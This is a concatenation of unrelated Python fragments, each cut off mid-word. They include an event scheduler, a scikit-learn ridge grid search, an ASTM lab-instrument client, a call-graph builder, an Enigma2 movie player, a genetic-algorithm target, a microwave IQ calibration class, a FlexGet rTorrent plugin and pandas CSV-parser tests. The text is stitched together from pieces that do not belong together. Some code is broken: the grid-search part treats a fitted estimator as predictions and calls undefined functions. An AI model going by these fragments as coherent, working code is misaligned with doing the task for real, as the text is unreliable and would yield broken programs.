irst model that has to transition :returns: timestamp of the first model """ first = self.heap[0] while len(self.mapped[first]) == 0: del self.mapped[first] heappop(self.heap) first = self.heap[0] # The age was stripped of return (first, 1) def getImminent(self, time): """ Returns a list of all models that transition at the provided time, with the specified epsilon deviation allowed. :param time: timestamp to check for models .. warning:: For efficiency, this method only checks the **first** elements, so trying to invoke this function with a timestamp higher than the value provided with the *readFirst* method, will **always** return an empty set. """ t, age = time imm_children = set() try: first = self.heap[0] if (abs(first - t) < self.epsilon): #NOTE this would change the original set, though this doesn't matter as it is no longer used imm_children = self.mapped.pop(first) heappop(self.heap) first = self.heap[0] while (abs(first - t) < self.epsilon): imm_children |= self.mapped.pop(first) heappop(self.heap) first = self.heap[0] except IndexError: pass return imm_children
# Grid Search for Algorithm Tuning import numpy as np import pandas as pd from sklearn import datasets from sklearn.linear_model import Ridge from sklearn.grid_search import GridSearchCV ### Plotting function ### from matplotlib import pyplot as plt from sklearn.metrics import r2_score def plot_r2(y, y_pred, title): plt.figure(figsize=(10, 6)) plt.grid() plt.scatter(y, y_pred, marker='.') plt.xlabel("Actual Target"); plt.ylabel("Predicted Target") plt.title(title) xmn, xmx = plt.xlim() ymn, ymx = plt.ylim() mx = max(xmx, ymx) buff = mx * .1 plt.
text(xmn + buff, mx - buff, "R2 Score: %f" % (r2_score(y, y_pred), ), size=15) plt.plot([0., mx], [0., mx]) plt.xlim(
xmn, mx) plt.ylim(ymn, mx) ### Preprocessing ### dataset = pd.read_csv("train.csv") dataset.head() feats = dataset.drop("revenue", axis=1) X = feats.values #features y = dataset["revenue"].values #target # prepare a range of alpha values to test alphas = np.array([1,0.1,0.01,0.001,0.0001,0]) # 100000 works best. # create and fit a ridge regression model, testing each alpha model = Ridge() grid = GridSearchCV(estimator=model, param_grid=dict(alpha=alphas)) y_pred = grid.fit(X, y) r2_score(y, y_pred) rmse = sqrt(mean_squared_error(y, y_pred)) print rmse
fro
m .site import
Site
.mapping[self.state]) self.state = state def is_acceptable(self, state): if self.mapping is None: return True if state not in self.mapping: return False next_types = self.mapping[self.state] return '*' in next_types or state in next_types DEFAULT_RECORDS_FLOW_MAP = { None: ['H'], 'H': ['C', 'M', 'P', 'Q', 'L'], 'P': ['C', 'M', 'O', 'L'], 'Q': ['C', 'M', 'O', 'L'], 'O': ['C', 'M', 'P', 'O', 'R', 'L'], 'R': ['C', 'M', 'P', 'O', 'R', 'S', 'L'], 'S': ['C', 'M', 'P', 'O', 'R', 'S', 'L'], 'C': ['*'], 'M': ['*'], 'L': ['H'] } class Emitter(object): """ASTM records emitter for :class:`Client`. Used as wrapper for user provided one to provide proper routines around for sending Header and Terminator records. :param emitter: Generator/coroutine. :param encoding: Data encoding. :type encoding: str :param flow_map: Records flow map. Used by :class:`RecordsStateMachine`. :type: dict :param chunk_size: Chunk size in bytes. If :const:`None`, emitter record wouldn't be split into chunks. :type chunk_size: int :param bulk_mode: Sends all records for single session (starts from Header and ends with Terminator records) via single message instead of sending each record separately. If result message is too long, it may be split by chunks if `chunk_size` is not :const:`None`. Keep in mind, that collecting all records for single session may take some time and server may reject data by timeout reason. :type bulk_mode: bool """ #: Records state machine controls emitting records in right order. It #: receives `records_flow_map` as only argument on Emitter initialization. state_machine = RecordsStateMachine def __init__(self, emitter, flow_map, encoding, chunk_size=None, bulk_mode=False): self._emitter = emitter() self._is_active = False self.encoding = encoding self.records_sm = self.state_machine(flow_map) # flag to signal that user's emitter produces no records self.empty = False # last sent sequence number self.last_seq = 0 self.buffer = [] self.chunk_size = chunk_size self.bulk_mode = bulk_mode def _get_record(self, value=None): record = self._emitter.send(value if self._is_active else None) if not self._is_active: self._is_active = True if isinstance(record, Record): record = record.to_astm() try: self.records_sm(record[0]) except Exception as err: self.throw(type(err), err.args) return record def _send_record(self, record): if self.bulk_mode: records = [record] while True: record = self._get_record(True) records.append(record) if record[0] == 'L': break chunks = encode(records, self.encoding, self.chunk_size) else: self.last_seq += 1 chunks = encode([record], self.encoding, self.chunk_size, self.last_seq) self.buffer.extend(chunks) data = self.buffer.pop(0) self.last_seq += len(self.buffer) if record[0] == 'L': self.last_seq = 0 self.buffer.append(EOT) return data def send(self, value=None): """Passes `value` to the emitter. Semantically acts in same way as :meth:`send` for generators. If the emitter has any value within local `buffer` the returned value will be extracted from it unless `value` is :const:`False`. :param value: Callback value. :const:`True` indicates that previous record was successfully received and accepted by server, :const:`False` signs about his rejection. :type value: bool :return: Next record data to send to server. :rtype: bytes """ if self.buffer and value: return self.buffer.pop(0) record = self._get_record(value) return self._send_record(record) def throw(self, exc_type, exc_val=None, exc_tb=None): """Raises exception inside the emitter. Acts in same way as :meth:`throw` for generators. If the emitter had catch an exception and return any record value, it will be proceeded in common way. """ record = self._emitter.throw(exc_type, exc_val, exc_tb) if record is not None: return self._send_record(record) def close(self): """Closes the emitter. Acts in same way as :meth:`close` for generators. """ self._emitter.close() class Client(ASTMProtocol): """Common ASTM client implementation. :param emitter: Generator function that will produce ASTM records. :type emitter: function :param host: Server IP address or hostname. :type host: str :param port: Server port number. :type port: int :param timeout: Time to wait for response from server. If response wasn't received, the :meth:`on_timeout` will be called. If :const:`None` this timer will be disabled. :type timeout: int :param flow_map: Records flow map. Used by :class:`RecordsStateMachine`. :type: dict :param chunk_size: Chunk size in bytes. :const:`None` value prevents records chunking. :type chunk_size: int :param bulk_mode: Sends all records for single session (starts from Header and ends with Terminator records) via single message instead of sending each record separately. If result message is too long, it may be split by chunks if `chunk_size` is not :const:`None`. Keep in mind, that collecting all records for single session may take some time and server may reject data by timeout reason. :type bulk_mode: bool Base `emitter` is a generator that yield ASTM records one by one preserving their order:: from astm.records import ( HeaderRecord, PatientRecord, OrderRecord, TerminatorRecord ) def emitter(): assert (yield HeaderRecord()), 'header was rejected' ok = yield PatientRecord(name={'last': 'foo', 'first': 'bar'}) if ok: # you also can decide what to do in case of record rejection
assert (yield OrderRecord()) yield TerminatorRecord() # we may do not care about rejection :class:`Client` thought :class:`RecordsStateMachine` keep track on this order, raising :exc:`AssertionError` if it is broken. When `emitter` terminates with :exc:`StopIteration` or :exc:`GeneratorExit` exception client connection to server closing too. You may provide endless `emitter` by wrapping function body with ``while True: ...`` loop polling data from s
ource from time to time. Note, that server may have communication timeouts control and may close session after some time of inactivity, so be sure that you're able to send whole session (started by Header record and ended by Terminator one) within limited time frame (commonly 10-15 sec.). """ #: Wrapper of emitter to provide session context and system logic about #: sending head and tail data. emitter_wrapper = Emitter def __init__(self, emitter, host='localhost', port=15200, encoding=None, timeout=20, flow_map=DEFAULT_RECORDS_FLOW_MAP, chunk_size=None, bulk_mode=False): super(Client, self).__init__(timeout=timeout) self.create_socket(socket.AF_INET, socket.SOCK_STREAM) self.connect((host, port)) self.emitter = self.emitter_wrapper( emitter, encoding=encoding or self.encoding, flow_map=f
# -*- coding: utf-8 -*- # # LICENCE MIT # # DESCRIPTION Callgraph builder. # # AUTHOR Michal Bukovsky <michal.bukovsky@trilogic.cz> # from operator import attrgetter from inspect import signature from callgraph.hooks import Hooks from callgraph.utils import AuPair from callgraph.symbols import Symbol, UnarySymbol from callgraph.symbols import IterableConstantSymbol, MappingConstantSymbol from callgraph.nodes import make_node from callgraph.indent_printer import IndentPrinter, NonePrinter, dump_tree # TODO(burlog): hooks as callbacks # TODO(burlog): properties tests # TODO(burlog): process signature? are defs invoked during import? # TODO(burlog): tests for global variables # TODO(burlog): __getattr__, __getattribute__ overrides will be problem # TODO(burlog): make result of list(), tuple(), dict(), ... iterable class CallGraphBuilder(object): def __init__(self, global_variables={}, silent=False): self.printer = NonePrinter() if silent else IndentPrinter() self.global_symbols = self.make_kwargs_symbols(global_variables) self.hooks = Hooks(self) self.current_lineno = 0 self.tot = None def print_banner(self, printer, node): extra = "<" + node.qualname + "> " if node.qualname != node.name else "" printer("@ Analyzing: {0} {1}at {2}:{3}"\ .format(node.ast.name, extra, node.filename, node.lineno)) def set_current_lineno(self, printer, expr_lineno): lineno = self.tot.lineno + expr_lineno if lineno == self.current_lineno: return self.current_lineno = lineno printer("+ line at {0}:{1}".format(self.tot.filename, lineno)) printer("+", self.tot.source_line(expr_lineno).strip()) def make_kwargs_symbols(self, kwargs): return dict((k, UnarySymbol(self, k, v)) for k, v in kwargs.items()) def build(self, function, kwargs={}): self.root = None self.hooks.clear() symbol = UnarySymbol(self, function.__name__, function) return self.process(symbol, kwargs=self.make_kwargs_symbols(kwargs)) def process(self, symbol, parent=None, a
rgs=[], kwargs={}): # attach new node to parent list node = make_node(symbol) with AuPair(self, node): if parent: where = parent.filename, self.current_lineno if not parent.attach(node, where): return node # builtins or c/c++ objects have no co
de if node.is_opaque: return node if not symbol.iscallable(): return node # print nice banner self.print_banner(self.printer, node) # magic follows with self.printer as printer: self.inject_arguments(printer, node, args, kwargs) self.process_function(printer, node, args, kwargs) return node def process_function(self, printer, node, args, kwargs): for expr in node.ast.body: for callee, args, kwargs in expr.evaluate(printer, node.symbol): self.process(callee, node, args.copy(), kwargs.copy()) def inject_arguments(self, printer, node, args, kwargs): sig = signature(node.symbol.value) self.inject_self(printer, node, sig, args, kwargs) bound = sig.bind_partial(*args, **self.polish_kwargs(sig, kwargs)) self.inject_defaults(printer, node, sig, bound) for name, value in bound.arguments.items(): value_symbol = self.as_symbol(value) printer("% Binding argument:", name + "=" + str(value_symbol)) node.symbol.set(name, value_symbol) def polish_kwargs(self, sig, kwargs): for param in sig.parameters.values(): if param.kind == param.VAR_KEYWORD: return kwargs return dict(self.iter_kwargs(sig, kwargs)) def iter_kwargs(self, sig, kwargs): for param in sig.parameters.values(): if param.kind == param.POSITIONAL_OR_KEYWORD: if param.name in kwargs: yield param.name, kwargs[param.name] def inject_self(self, printer, node, sig, args, kwargs): if node.symbol.myself and sig.parameters: # TODO(burlog): better bound method detection if next(iter(sig.parameters.keys())) == "self": args.insert(0, node.symbol.myself) else: # TODO(burlog): improve detection logic kwargs["self"] = node.symbol.myself def inject_defaults(self, printer, node, sig, bound): for param in sig.parameters.values(): if param.name not in bound.arguments: if param.default is not param.empty: symbol = UnarySymbol(self, param.name, param.default) bound.arguments[param.name] = symbol def as_symbol(self, value): if isinstance(value, Symbol): return value elif isinstance(value, (tuple, list)): return IterableConstantSymbol(self, tuple, value) elif isinstance(value, dict): values = list(value.values()) keys = list(UnarySymbol(self, "str", k) for k in value.keys()) return MappingConstantSymbol(self, dict, keys, values) raise RuntimeError("Can't convert value to symbol: " + str(value)) # dogfooding build function if __name__ == "__main__": builder = CallGraphBuilder() kwargs = {"self": CallGraphBuilder, "function": CallGraphBuilder.build} root = builder.build(CallGraphBuilder.build, kwargs) print(80 * "=") dump_tree(root, lambda x: x.children)
s current selected track: " + str(x)) return True else: print("[MoviePlayer] audio track is current selected track: " + str(x)) return True elif entry == x[1] and seltrack != x[0]: if useAc3: if x[2].startswith('AC'): print("[MoviePlayer] audio track match: " + str(x)) tracks.selectTrack(x[0]) return True else: print("[MoviePlayer] audio track match: " + str(x)) tracks.selectTrack(x[0]) return True return False class MoviePlayer(InfoBarAspectSelection, InfoBarSimpleEventView, InfoBarBase, InfoBarShowHide, InfoBarLongKeyDetection, InfoBarMenu, InfoBarEPG, \ InfoBarSeek, InfoBarShowMovies, InfoBarInstantRecord, InfoBarAudioSelection, HelpableScreen, InfoBarNotifications, InfoBarServiceNotifications, InfoBarPVRState, InfoBarCueSheetSupport, InfoBarMoviePlayerSummarySupport, InfoBarSubtitleSupport, Screen, InfoBarTeletextPlugin, InfoBarServiceErrorPopupSupport, InfoBarExtensions, InfoBarPlugins, InfoBarPiP, InfoBarZoom, InfoBarHdmi, InfoBarButtonSetup): ENABLE_RESUME_SUPPORT = True ALLOW_SUSPEND = True instance = None def __init__(self, session, service, slist = None, lastservice = None): Screen.__init__(self, session) InfoBarAspectSelection.__init__(self) InfoBarAudioSelection.__init__(self) InfoBarSimpleEventView.__init__(self) self.pts_pvrStateDialog = "" self["key_yellow"] = Label() self["key_blue"] = Label() self["key_green"] = Label() self["eventname"] = Label() self["state"] = Label() self["speed"] = Label() self["statusicon"] = MultiPixmap() self["actions"] = HelpableActionMap(self, "MoviePlayerActions", { "leavePlayer": (self.leavePlayer, _("leave movie player...")), "leavePlayerOnExit": (self.leavePlayerOnExit, _("leave movie player...")) }) self.allowPiP = True for x in HelpableScreen, InfoBarShowHide, InfoBarLongKeyDetection, InfoBarMenu, InfoBarEPG, \ InfoBarBase, InfoBarSeek, InfoBarShowMovies, InfoBarInstantRecord, \ InfoBarAudioSelection, InfoBarNotifications, InfoBarSimpleEventView, \ InfoBarServiceNotifications, InfoBarPVRState, InfoBarCueSheetSupport, \ InfoBarMoviePlayerSummarySupport, InfoBarSubtitleSupport, \ InfoBarTeletextPlugin, InfoBarServiceErrorPopupSupport, InfoBarExtensions, \ InfoBarPlugins, InfoBarPiP, InfoBarZoom, InfoBarButtonSetup: x.__init__(self) self.onChangedEntry = [ ] self.servicelist = slist self.lastservice = lastservice or session.nav.getCurrentlyPlayingServiceOrGroup() session.nav.playService(service) self.cur_service = service self.returning = False self.onClose.append(self.__onClose) self.onShow.append(self.doButtonsCheck) self.__event_tracker = ServiceEventTracker(screen=self, eventmap= { enigma.iPlayableService.evStart: self.__evStart }) assert MoviePlayer.instance is None, "class InfoBar is a singleton class and just one instance of this class is allowed!" MoviePlayer.instance = self # is needed for every first call of MoviePlayer self.__evStart() def __evStart(self): self.switchAudioTimer = enigma.eTimer() self.switchAudioTimer.callback.append(self.switchAudio) self.switchAudioTimer.start(750, True) # 750 is a safe-value def switchAudio(self): service = self.session.nav.getCurrentlyPlayingServiceOrGroup() if service: # we go this way for other extensions as own records(they switch over pmt) path = service.getPath() import os ext = os.path.splitext(path)[1].lower() exts = [".mkv", ".avi", ".divx", ".mp4"] # we need more extensions here ? if ext.lower() in exts: service = self.session.nav.getCurrentService() if service: setAudioTrack(service) def doButtonsCheck(self): if config.plisettings.ColouredButtons.value: self["key_yellow"].setText(_("Extensions")) self["key_green"].setText(_("Green Panel")) self["key_blue"].setText(_("Blue Panel")) def __onClose(self): MoviePlayer.instance = None from Screens.MovieSelection import playlist del playlist[:] Screens.InfoBar.InfoBar.instance.callServiceStarted() self.session.nav.playService(self.lastservice) config.usage.last_movie_played.value = self.cur_service.toString() config.usage.last_movie_played.save() def handleLeave(self, how): self.is_closing = True if how == "ask": if config.usage.setup_level.index < 2: # -expert list = ( (_("Yes"), "quit"), (_("No"), "continue") ) else: list = ( (_("Yes"), "quit"), (_("Yes, returning to movie list"), "movielist"), (_("Yes, and delete this movie"), "quitanddelete"), (_("Yes, delete this movie and return to movie list"), "deleteandmovielist"), (_("No"), "continue"), (_("No, but restart from begin"), "restart") ) from Screens.ChoiceBox import ChoiceBox self.session.openWithCallback(self.leavePlayerConfirmed, ChoiceBox, title=_("Stop playing this movie?"), list = list) else: self.leavePlayerConfirmed([True, how]) def leavePlayer(self): setResumePoint(self.session) self.handleLeave(config.usage.on_movie_stop.value) def leavePlayerOnExit(self): if self.shown: self.hide() elif self.session.pipshown and "popup" in config.usage.pip_hideOnExit.value: if config.usage.pip_hideOnExit.value == "popup": self.session.openWithCallback(self.hidePipOnExitCallback, MessageBox, _("Disable Picture in Picture"), simple=True) else: self.hidePipOnExitCallback(True) elif config.usage.leave_movieplayer_onExit.value == "popup": self.session.openWithCallback(self.leavePlayerOnExitCallback, MessageBox, _("Exit movie player?"), simple=True) elif config.usage.leave_movieplayer_onExit.value == "without popup": self.leavePlayerOnExitCallback(True) elif config.usage.leave_movieplayer_onExit.value == "stop": self.leavePlayer() def leavePlayerOnExitCallback(self, answer): if answer: setResumePoint(self.session) self.handleLeave("quit") def hidePipOnExitCallback(self, answer): if answer: self.showPiP() def deleteConfirmed(self, answer): if answer: self.leavePlayerConfirmed((True, "quitanddeleteconfirmed")) def deleteAndMovielistConfirmed(self, answer): if answer: self.leavePlayerConfirmed((True, "deleteandmovielistconfirmed")) def movielistAgain(self): from Screens.MovieSelection import playlist del playlist[:] self.session.nav.playService(self.lastservice) self.leavePlayerConfirmed((True, "movielist")) def leave
PlayerConfirmed(self,
answer): answer = answer and answer[1] if answer is None: return if answer in ("quitanddelete", "quitanddeleteconfirmed", "deleteandmovielist", "deleteandmovielistconfirmed"): ref = self.session.nav.getCurrentlyPlayingServiceOrGroup() serviceHandler = enigma.eServiceCenter.getInstance() if answer in ("quitanddelete", "deleteandmovielist"): msg = '' if config.usage.movielist_trashcan.value: import Tools.Trashcan try: trash = Tools.Trashcan.createTrashFolder(ref.getPath()) Screens.MovieSelection.moveServiceFiles(ref, trash) # Moved to trash, okay if answer == "quitanddelete": self.close() else: self.movielistAgain() return except Exception, e: print "[InfoBar] Failed to move to .Trash folder:", e msg = _("Cannot move to trash can") + "\n" + str(e) + "\n" info = serviceHandler.info(ref) name = info and info.getName(ref) or _("this recording") msg += _("Do you really want to delete %s?") % name if answer == "quitanddelete": self.session.openWithCallback(self.deleteConfirmed, MessageBox, msg) elif answer == "deleteandmovielist": self.session.openWithCallback(self.deleteAndMovielistConfirmed, MessageBox, msg) return elif answer in ("quitanddeleteconfirmed", "deleteandmovielistconfirmed"): offline = serviceHandler.offlineOperations(ref) if offline.deleteFromDisk(0): self.session.openWithCallback(self.close, MessageBox, _("You cannot delete this!"), MessageBox.TYPE_ERROR) if answer == "deleteandmovielistconfirmed": self.movielistAgain() return if answer in ("quit", "quitanddeleteconfirmed"): self.c
class target(object): def __init__(self): self.encodingString = "1,10 1,10 1,10 1,10 1,10 1.0 p1-1,10 1,10 1,10 1,10 1,10 1.0 p2" self.canAdd = False self.canRemove = False self.initializationType = "sequential" self.encodingTable = None self.group1 = [] self.group2 = [] def build_from_genome(self,genome): assert genome != None, "Null genome passed to target!"
self.group1 = genome[0][1:] self.group2 = genome[1][1:] #self.params = [delta,minArea,maxArea,maxVariation,minDiversity,maxEvolution,areaThreshold,minMargin,edgeBlurSize] def evaluate(self): genes = [] m = 1 s = 0 for arg in self.group1: s+=arg genes.append(arg) for arg in self.group2: m*=arg gene
s.append(arg) duplicateCount = len(genes) - len(set(genes)) m-=360 s-=36 fitness = -(abs(m) + abs(s)) - duplicateCount #print("\nFITNESS:",fitness,"\n") return fitness def validate_genome(self,genome): return True
if "freq" in parameters_dict: self.set_frequency(parameters_dict["freq"]) if "dac_overridden" in parameters_dict: self._dac_overridden = parameters_dict["dac_overridden"] else: self._dac_overridden = False def get_iqawg(self): self._iqawg.set_parameters( {'calibration': self._current_cal}) # ensure return self._iqawg def set_if_frequency(self, if_frequency): self._if_frequency = if_frequency self._if_period = 1 / if_frequency * 1e9 # ns def get_if_frequency(self): return self._if_frequency def set_output_state(self, state): self._lo.set_output_state(state) def set_frequency(self, freq): self._frequency = freq self._lo.set_frequency(self._frequency + self._if_frequency) self._requested_cal = self.get_calibration(self._frequency, self._power) self._output_SSB() def set_power(self, power): if power > self._default_calibration_power + 10: raise ValueError("Power can be % dBm max, requested %d dBm" % ( self._default_calibration_power + 10, power)) self._power = power self._requested_cal = self.get_calibration(self._frequency, self._power) self._lo.set_power(self._requested_cal.get_lo_power()) self._output_SSB() def get_power(self): return self._power def set_marker_period(self, marker_period): ''' For some applications there is need to control the length of the interval between triggers output by the AWG of the IQVectorGenerator. Parameters ---------- marker_period: ns, float real trigger period will be recalculated to be not shorter than <marker_period> ns, but still divisible by the IF period ''' self._requested_marker_period = marker_period correct_marker_period = ceil( marker_period / self._marker_period_divisor) * \ self._marker_period_divisor if correct_marker_period != self._marker_period: self._marker_period = correct_marker_period if self._requested_cal is not None: self._current_cal = None self._output_SSB() for slave_iqvg in self._slave_iqvgs: slave_iqvg.set_marker_period(self._marker_period) def _output_SSB(self): if self._requested_cal != self._current_cal: # print(f"IQVG {self._name}: outputting pulse sequence to update calibration for frequency: {self._frequency/1e9:.4f} GHz" # f", power: {self._power} dBm.") self._iqawg.set_parameters({"calibration": self._requested_cal}) pb = self._iqawg.get_pulse_builder() if_freq = self._requested_cal.get_radiation_parameters()[ "if_frequency"] resolution = self._requested_cal.get_radiation_parameters()[ "waveform_resolution"] if_period = 1 / if_freq * 1e9 if (if_period * 1e9) % resolution != 0: print( f"IQVectorGenerator {self._name} warning: IF period is not divisible by " "calibration waveform resolution. Phase coherence will be bad.") seq = pb.add_sine_pulse(self._marker_period).build() self._iqawg.output_pulse_sequence(seq) self._current_cal = self._requested_cal # time.sleep(1) def _load_cal_db(self): self._cal_db = load_IQMX_calibration_database(self._cal_db_name, 0) def _around_frequency(self, frequency): # return ceil(frequency/self._calibration_step)*self._calibration_step return round(frequency / self._calibration_step) * self._calibration_step def get_calibration(self, frequency, power): frequency = self._around_frequency(frequency) # frequency = round(frequency/self._calibration_step)*self._calibration_step if self._cal_db is None: self._load_cal_db() cal = \ self._cal_db.get(frozenset(dict(lo_power=14, ssb_power=self._default_calibration_power, lo_frequency=self._if_frequency + frequency, if_frequency=self._if_frequency, waveform_resolution=1, sideband_to_maintain='left').items())) if (cal is None) or self._recalibrate_mixer: calibrator = IQCalibrator(self._iqawg, self._sa, self._lo, self._cal_db_name, 0, sidebands_to_suppress=6, output_widget=self._calibration_widget) ig = self._calibration_initial_guess cal = calibrator.calibrate( lo_frequency=frequency + self._if_frequency, if_frequency=self._if_frequency, lo_power=14, ssb_power=self._default_calibration_power, waveform_resolution=1, iterations=3, minimize_iterlimit=100, sa_res_bandwidth=300, initial_guess=ig) save_IQMX_calibration(cal) self._load_cal_db() # make sure to include new calibration into cache cal._ssb_power = power cal._if_amplitudes = cal._if_amplitudes / np.sqrt( 10 ** ((self._default_calibration_power - power) / 10)) # self._calibration_initial_guess["if_amplitudes"] = cal._if_amplitudes self._calibration_initial_guess["if_phase"] = cal._if_phase return cal else: cal = cal.copy() cal._if_amplitudes = cal._if_amplitudes / np.sqrt( 10 ** ((self._default_calibration_power - power) / 10)) return cal def calibrate_mixer(self, fstart, fstop, recalibrate=False): """ Performs calibration of the mixer in a frequency range Parameters ---------- fstart: float start of the frequency range fstop : float stop of the frequency range recalibrate : bool Whether or not to calibrate from scratch and override previous calibration in this interval. """ fstart = self._around_frequency(fstart) fstop = self._around_frequency(fstop) self._recalibrate_mixer = recalibrate pb = tqdm(np.arange(fstart, fstop + self._calibration_step, self._calibration_step), smoothing=0) for frequency in pb: pb.set_description("%.3f GHz" % (frequency / 1e9)) for cou
nter in range(3): try: self.set_frequency(frequency) break except ValueError: print("Poor calibration at %.3f GHz, retry count " "%d" % (frequency / 1e9, counter)) self._calibration_initial_guess["dc_offest"] = \
np.random.uniform(.03, 0.1, size=2) self._recalibrate_mixer = False def test_calibration(self, fstart, fstop, step=1e6, sidebands_to_plot=[-1, 0, 1], remeasure=False): """ Tests the saved calibrations by monitoring all the sidebands throughout the specified frequency range Parameters ---------- fstart: float, Hz start of the frequency range fstop: float, Hz stop of the frequency range step: float, Hz step of the scan remeasure : bool remeasure or just replot the data from the previous run """ sideband_shifts = np.linspace(-3, 3, 7) * self._if_frequency freqs = np.arange(fstart, fstop + step, step)
if config_value: options[opt_key] = entry.render(config_value) elif entry_value: options[opt_key] = entry.render(entry_value) # Convert priority from string to int priority = options.get('priority') if priority and priority in self.priority_map: options['priority'] = self.priority_map[priority] # Map Flexget path to directory in rTorrent if options.get('path'): options['directory'] = options['path'] del options['path'] if 'directory' in options: options['directory'] = pathscrub(options['directory']) return options def on_task_start(self, task, config): try: client = RTorrent(os.path.expanduser(config['uri']), username=config.get('username'), password=config.get('password'), digest_auth=config['digest_auth'], session=task.requests) if client.version < [0, 9, 2]: log.error('rtorrent version >=0.9.2 required, found {0}'.format('.'.join(map(str, client.version)))) task.abort('rtorrent version >=0.9.2 required, found {0}'.format('.'.join(map(str, client.version)))) except (IOError, xmlrpc_client.Error) as e: raise plugin.PluginError("Couldn't connect to rTorrent: %s" % str(e)) class RTorrentOutputPlugin(RTorrentPluginBase): schema = { 'type': 'object', 'properties': { # connection info 'uri': {'type': 'string'}, 'username': {'type': 'string'}, 'password': {'type': '
string'}, 'digest_auth': {'type': 'boolean', 'default': False}, 'start': {'type': 'boolean', 'default': True}, 'mkdir': {'type': 'boolean', 'default': True}, 'action': {'type':
'string', 'emun': ['update', 'delete', 'add'], 'default': 'add'}, # properties to set on rtorrent download object 'message': {'type': 'string'}, 'priority': {'type': 'string'}, 'path': {'type': 'string'}, 'custom1': {'type': 'string'}, 'custom2': {'type': 'string'}, 'custom3': {'type': 'string'}, 'custom4': {'type': 'string'}, 'custom5': {'type': 'string'}, }, 'required': ['uri'], 'additionalProperties': False, } def _verify_load(self, client, info_hash): ex = IOError() for _ in range(0, 5): try: return client.torrent(info_hash, fields=['hash']) except (IOError, xmlrpc_client.Error) as e: ex = e sleep(0.5) raise ex @plugin.priority(120) def on_task_download(self, task, config): # If the download plugin is not enabled, we need to call it to get # our temp .torrent files if config['action'] == 'add' and 'download' not in task.config: download = plugin.get_plugin_by_name('download') download.instance.get_temp_files(task, handle_magnets=True, fail_html=True) @plugin.priority(135) def on_task_output(self, task, config): client = RTorrent(os.path.expanduser(config['uri']), username=config.get('username'), password=config.get('password'), digest_auth=config['digest_auth'], session=task.requests) for entry in task.accepted: if config['action'] == 'add': if task.options.test: log.info('Would add %s to rTorrent', entry['url']) continue try: options = self._build_options(config, entry) except RenderError as e: entry.fail("failed to render properties %s" % str(e)) continue self.add_entry(client, entry, options, start=config['start'], mkdir=config['mkdir']) info_hash = entry.get('torrent_info_hash') if not info_hash: entry.fail('Failed to %s as no info_hash found' % config['action']) continue if config['action'] == 'delete': if task.options.test: log.info('Would delete %s (%s) from rTorrent', entry['title'], entry['torrent_info_hash']) continue self.delete_entry(client, entry) if config['action'] == 'update': if task.options.test: log.info('Would update %s (%s) in rTorrent', entry['title'], entry['torrent_info_hash']) continue self.update_entry(client, entry, config) def delete_entry(self, client, entry): try: client.delete(entry['torrent_info_hash']) log.verbose('Deleted %s (%s) in rtorrent ' % (entry['title'], entry['torrent_info_hash'])) except (IOError, xmlrpc_client.Error) as e: entry.fail('Failed to delete: %s' % str(e)) return def update_entry(self, client, entry, config): info_hash = entry['torrent_info_hash'] # First check if it already exists try: existing = client.torrent(info_hash, fields=['base_path']) except IOError as e: entry.fail("Error updating torrent %s" % str(e)) return except xmlrpc_client.Error as e: existing = False # Build options but make config values override entry values try: options = self._build_options(config, entry, entry_first=False) except RenderError as e: entry.fail("failed to render properties %s" % str(e)) return if existing and 'directory' in options: # Check if changing to another directory which requires a move if options['directory'] != existing['base_path'] \ and options['directory'] != os.path.dirname(existing['base_path']): try: log.verbose("Path is changing, moving files from '%s' to '%s'" % (existing['base_path'], options['directory'])) client.move(info_hash, options['directory']) except (IOError, xmlrpc_client.Error) as e: entry.fail('Failed moving torrent: %s' % str(e)) return # Remove directory from update otherwise rTorrent will append the title to the directory path if 'directory' in options: del options['directory'] try: client.update(info_hash, options) log.verbose('Updated %s (%s) in rtorrent ' % (entry['title'], info_hash)) except (IOError, xmlrpc_client.Error) as e: entry.fail('Failed to update: %s' % str(e)) return def add_entry(self, client, entry, options, start=True, mkdir=False): if 'torrent_info_hash' not in entry: entry.fail('missing torrent_info_hash') return if entry['url'].startswith('magnet:'): torrent_raw = 'd10:magnet-uri%d:%se' % (len(entry['url']), entry['url']) torrent_raw = torrent_raw.encode('ascii') else: # Check that file is downloaded if 'file' not in entry: raise plugin.PluginError('Temporary download file is missing from entry') # Verify the temp file exists if not os.path.exists(entry['file']): raise plugin.PluginError('Temporary download file is missing from disk') # Verify valid torrent file if not is_torrent_file(entry['file']): entry.fail("Downloaded temp file '%s' is not a torrent file" % entry['file']) return try: with open(entry['file'], 'rb') as f: torrent_raw = f.read() except IOError as e: entry.fail('Failed to add to rTorr
Frame, Index, MultiIndex, ) import pandas._testing as tm def test_default_separator(python_parser_only): # see gh-17333 # # csv.Sniffer in Python treats "o" as separator. data = "aob\n1o2\n3o4" parser = python_parser_only expected = DataFrame({"a": [1, 3], "b": [2, 4]}) result = parser.read_csv(StringIO(data), sep=None) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize("skipfooter", ["foo", 1.5, True]) def test_invalid_skipfooter_non_int(python_parser_only, skipfooter): # see gh-15925 (comment) data = "a\n1\n2" parser = python_parser_only msg = "skipfooter must be an integer" with pytest.raises(ValueError, match=msg): parser.read_csv(StringIO(data), skipfooter=skipfooter) def test_invalid_skipfooter_negative(python_parser_only): # see gh-15925 (comment) data = "a\n1\n2" parser = python_parser_only msg = "skipfooter cannot be negative" with pytest.raises(ValueError, match=msg): parser.read_csv(StringIO(data), skipfooter=-1) @pytest.mark.parametrize("kwargs", [{"sep": None}, {"delimiter": "|"}]) def test_sniff_delimiter(python_parser_only, kwargs): data = """index|A|B|C foo|1|2|3 bar|4|5|6 baz|7|8|9 """ parser = python_parser_only result = parser.read_csv(StringIO(data), index_col=0, **kwargs) expected = DataFrame( [[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["A", "B", "C"], index=Index(["foo", "bar", "baz"], name="index"), ) tm.assert_frame_equal(result, expected) def test_sniff_delimiter_comment(python_parser_only): data = """# comment line index|A|B|C # comment line foo|1|2|3 # ignore | this bar|4|5|6 baz|7|8|9 """ parser = python_parser_only result = parser.read_csv(StringIO(data), index_col=0, sep=None, comment="#") expected = DataFrame( [[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["A", "B", "C"], index=Index(["foo", "bar", "baz"], name="index"), ) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize("encoding", [None, "utf-8"]) def test_sniff_delimiter_encoding(python_parser_only, encoding): parser = python_parser_only data = """ignore this ignore this too index|A|B|C foo|1|2|3 bar|4|5|6 baz|7|8|9 """ if encoding is not None: from io import TextIOWrapper data = data.encode(encoding) data = BytesIO(data) data = 